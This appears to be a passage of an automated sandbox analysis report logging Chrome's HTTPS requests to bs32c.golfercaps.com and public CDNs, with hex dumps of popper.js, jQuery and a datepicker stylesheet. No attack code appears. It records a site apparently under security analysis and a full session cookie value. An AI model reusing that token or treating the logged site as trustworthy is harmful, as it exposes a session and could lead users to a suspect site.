                                                                  Data Ascii: mal; color: rgb(85, 85, 85); outline: medium none; }.ui-widget-header .ui-icon.ui-icon-closethick { background: transparent url("close.png") repeat scroll 0% 0% / contain ; }#exit_icon { background: transparent url("close.png") repeat scroll 0% 0% / con


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.458492104.17.24.14443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:33 UTC603OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                  Host: cdnjs.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://bs32c.golfercaps.com/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:33 UTC958INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:33 GMT
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Access-Control-Allow-Origin: *
                                                                  Cache-Control: public, max-age=30672000
                                                                  ETag: W/"5eb03fa9-4af4"
                                                                  Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                  cf-cdnjs-via: cfworker/kv
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Timing-Allow-Origin: *
                                                                  X-Content-Type-Options: nosniff
                                                                  CF-Cache-Status: HIT
                                                                  Age: 376495
                                                                  Expires: Sat, 20 Dec 2025 21:42:33 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8D7MlzmId9bThZKsV7Vt8mX50oNfOW5JaokVB9ZtHx8t8r4OxHuNvBa6C5OdDQaIiPV9jHW5e0ZOOXDl1j5XdJIEh%2Brx6lqJ4oMWfhbJ0vYCHOSoeWFf%2FB%2BkTKnzUjv9JQkXSVcR"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                  Strict-Transport-Security: max-age=15780000
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5334cddf87c82-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-12-30 21:42:33 UTC411INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                  Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74 27 3a
                                                                  Data Ascii: .nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72 64 65 72
                                                                  Data Ascii: ar o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['border
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 72 6e 28
                                                                  Data Ascii: p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return(
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 69 64 74
                                                                  Data Ascii: t:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.widt
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 61 6e 63
                                                                  Data Ascii: warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={instanc
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73 69 76
                                                                  Data Ascii: .options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{passiv
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72
                                                                  Data Ascii: n o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){retur
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 47
                                                                  Data Ascii: n''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}function G
                                                                  2024-12-30 21:42:33 UTC1369INData Raw: 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 2c
                                                                  Data Ascii: n o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[o],


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  32192.168.2.458490188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:33 UTC1375OUTGET /vfd23ced/assets/axit-jquery.datepicker.css HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: text/css,*/*;q=0.1
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: style
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:33 UTC881INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:33 GMT
                                                                  Content-Type: text/css
                                                                  Content-Length: 734
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3nk%2ByVdRYe1kERAoPJIIkOdzbQt1Utz%2F9KTGOl5hg5qlIc2mPx%2B743DJtjjCOBHZpdEAdXQE4IhW3UCj%2BsqaHzZvv5NUil4nYXaB7OUTgvWUiUKRCZ4VcSH0wG5rWJ8FeDxarM%2B70w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa5334cdb544364-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1868&min_rtt=1652&rtt_var=774&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1953&delivery_rate=1767554&cwnd=206&unsent_bytes=0&cid=19fefc0f93c86753&ts=314&x=0"
                                                                  2024-12-30 21:42:33 UTC488INData Raw: 2f 2a 20 43 6f 64 65 20 74 69 64 69 65 64 20 75 70 20 62 79 20 53 63 72 61 70 42 6f 6f 6b 20 2a 2f 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 68 65 61 64 65 72 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 70 61 64 64 69 6e 67 3a 20 30 2e 32 65 6d 20 30 70 78 3b 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 20 7d 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 70 72 65 76 20 2e 75 69 2d 69 63 6f 6e 2c 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6e 65 78 74 20 2e 75 69 2d 69 63 6f 6e 20 7b 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 20 2d 31 65 2b 37 70 78 3b 20 7d 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 70 72 65 76
                                                                  Data Ascii: /* Code tidied up by ScrapBook */.ui-datepicker .ui-datepicker-header { position: relative; padding: 0.2em 0px; white-space: nowrap; }.ui-datepicker-prev .ui-icon, .ui-datepicker-next .ui-icon { text-indent: -1e+7px; }.ui-datepicker .ui-datepicker-prev
                                                                  2024-12-30 21:42:33 UTC246INData Raw: 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 32 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 63 61 6c 65 6e 64 61 72 2e 70 6e 67 22 29 3b 20 68 65 69 67 68 74 3a 20 31 35 70 78 3b 20 77 69 64 74 68 3a 20 31 36 70 78 3b 20 62 6f 72 64 65 72 3a 20 6d 65 64 69 75 6d 20 6e 6f 6e 65 3b 20 7d 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 74 6f 64 61 79 20 7b 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 3b 20 7d 0a 2e 68 61 73 44 61 74 65 70 69 63 6b 65 72 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 7d 0a 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6f 74 68 65 72 2d 6d 6f 6e 74 68 20 7b 20 6f 70 61 63 69 74 79 3a 20 30 2e 33 35 3b 20 7d 0a
                                                                  Data Ascii: ign: middle; margin-top: -2px; background-image: url("calendar.png"); height: 15px; width: 16px; border: medium none; }.ui-datepicker-today { border: 1px solid; }.hasDatepicker { display: inline; }.ui-datepicker-other-month { opacity: 0.35; }


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  33192.168.2.458491151.101.130.137443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:33 UTC578OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                  Host: code.jquery.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://bs32c.golfercaps.com/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:33 UTC612INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  Content-Length: 69597
                                                                  Server: nginx
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                  ETag: "28feccc0-10fdd"
                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                  Access-Control-Allow-Origin: *
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                  Accept-Ranges: bytes
                                                                  Age: 1154855
                                                                  Date: Mon, 30 Dec 2024 21:42:33 GMT
                                                                  X-Served-By: cache-lga21984-LGA, cache-nyc-kteb1890033-NYC
                                                                  X-Cache: HIT, HIT
                                                                  X-Cache-Hits: 903, 0
                                                                  X-Timer: S1735594954.696126,VS0,VE2
                                                                  Vary: Accept-Encoding
                                                                  2024-12-30 21:42:33 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                  Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                  2024-12-30 21:42:33 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
